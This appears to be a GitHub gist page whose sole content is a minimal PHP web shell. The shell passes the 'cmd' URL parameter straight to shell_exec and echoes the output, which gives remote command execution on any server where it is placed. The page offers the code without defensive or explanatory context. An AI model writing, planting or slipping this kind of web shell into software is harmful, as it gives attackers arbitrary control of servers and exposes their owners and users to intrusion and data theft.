Skip to content

Instantly share code, notes, and snippets.

@NitescuLucian
Created May 26, 2021 23:32
Show Gist options
  • Save NitescuLucian/3a1594bfbfd83c736fccc26a9dce8afa to your computer and use it in GitHub Desktop.
Save NitescuLucian/3a1594bfbfd83c736fccc26a9dce8afa to your computer and use it in GitHub Desktop.
<?php
if (isset($_GET['cmd'])){$output = shell_exec($_GET['cmd']);
echo "<pre>$output</pre>"; die();}
?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment